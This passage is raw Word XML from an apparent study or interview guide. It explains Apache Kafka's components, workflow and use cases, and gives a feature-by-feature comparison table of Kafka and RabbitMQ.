    <w:p w14:paraId="118FFA70" w14:textId="5F19F4EB" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="005B595D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="814" w:name="_Toc197868028"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="814"/>
    </w:p>
    <w:p w14:paraId="3A7F9E14" w14:textId="1F9AEB0A" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A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distributed event streaming platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for building </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time data pipelin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streaming applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can handle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of data with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fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE02913"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3292" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94A680"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CE4B95" w14:paraId="78F45A41" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37C46C38"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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05787385"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7E40A9" w:rsidRPr="00CE4B95" w14:paraId="084E183B" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51375E82"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roducer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5431747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Sends (publishes) messages to Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="0093961C" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="370453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onsumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C115917"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Reads messages from Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="7B161F07" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38F25FF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Topic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4558CF5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category/feed name to which messages are sent and from which they're received</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="14CD3E4C" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AB1501F"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Broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F5B836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Kafka server that stores data and serves clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="66E45B5C" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20DB935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luster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B0777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group of brokers working together</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="270E9089" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6191C2A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Zookeeper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE609B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sed for managing Kafka metadata (Note: Kafka 3.x+ is moving towards removing Zookeeper)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="4C2C6DB1" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74CBAB50"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artition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44780A35"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Topics are split into partitions for scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="2D709EB1" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F79025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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="405C3B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nique ID for each message within a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5484C23E"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3293" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CAB7B"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afka Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB30D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0BBCEFC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 is split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for parallelism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46CEE6"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store partitioned messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C3D3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using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4499BA"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Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (older versions) manages coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA6A5B"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3294" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F1393"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Kafka?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227EEB89"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Real-time data streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1EA748"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gh throughput &amp; low latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05045E0F"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distributed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13992451"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 and fault-tolerant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512FA1C"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cases: Logging, metrics, IoT, financial systems, chat systems, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411F755"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3295" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A7F1F"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FBC33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Log Aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D180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Real-Time Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0FB8E8"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Microservices Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29357992"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Event Sourcing / CQRS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03858EFD"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Stream Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with Kafka Streams or Apache Flink)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB352F"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3296" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC66DC" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7027BA6E" w14:textId="04775C7A" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C84C42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="815" w:name="_Toc197868029"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why does Kafka compare to RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="815"/>
    </w:p>
    <w:p w14:paraId="3F27F031" w14:textId="1B2AE03F" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="002D75F3" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F3197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CE4B95" w14:paraId="2FA108A0" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1125E30C"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758408E4"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Apache Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6556023F"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RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="089BBFBE" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FD49E8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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD2173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Distributed </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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Traditional </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>message broker / message queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="5BD45AE3" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A17845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essage Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="533CA6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ll-based</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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sh-based</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Broker pushes to consumers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="130AAD50" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CAF9C3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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7808DD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High </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>throughput</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, designed for big data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072434C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Low </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>latency</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, better for low-volume, fast delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="54A296DA" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA78DD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Durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F81D7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in memory or disk (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="67A06C36" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C8212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Ordering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2508876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Guaranteed within a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53405F9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Ordering is not guaranteed unless specifically handled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="08FDF05E" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1064489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 – Consumers can </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>re-read</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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 – Once consumed, message is gone unless persisted manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="3E7A6089" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10FAE9A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etention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E2FC5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ime-based/log-based retention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12F790C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removed after acknowledged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="2D8706DB" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D648B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outing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72B0E30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ich routing with exchanges (direct, fanout, topic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="409AF92C" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="301ED8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Use case fit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A72D0A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ask queues, short-lived jobs, transactional systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="4D20C250" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1455F1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Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401A4C1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Very low (suitable for real-time communication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="135C57BF" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CCB44FC"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mplexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D227428"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asier to set up</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="70BEF57C" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589EF28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nsumer Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64CA40F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Partition-based parallelism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E2A1D9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ompeting consumers for queues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
